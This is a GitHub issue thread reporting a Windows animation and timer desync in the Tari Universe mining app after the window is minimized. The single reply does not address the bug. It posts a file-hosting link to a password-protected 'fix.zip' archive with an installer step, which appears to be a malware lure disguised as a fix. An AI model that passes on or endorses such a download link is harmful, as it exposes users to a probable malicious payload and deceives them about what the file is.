### ISSUE TITLE
0.1.37: Windows: Animation had to "catch up" after window was minimized

### ISSUE THREAD

**Issue by metalaureate** [tari-project/universe#148]
**Describe the bug**
From Cole: So I was mining, and then i minimised the app, I re-opened it later, 
the animation looked like it had to "catch up" 
it instantly ran the end of block animation, started a new level, but the bottom right timer continued to count up for like 30 seconds

So it was a new animation, old timer

then it randomly just caught up to current, so it went from like 00:02 to 00:40 on current block time (assuming i had it minimalized for like 38 seconds

**To Reproduce**
Minimize window for a while
Then open

**Expected behavior**
No catch up

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
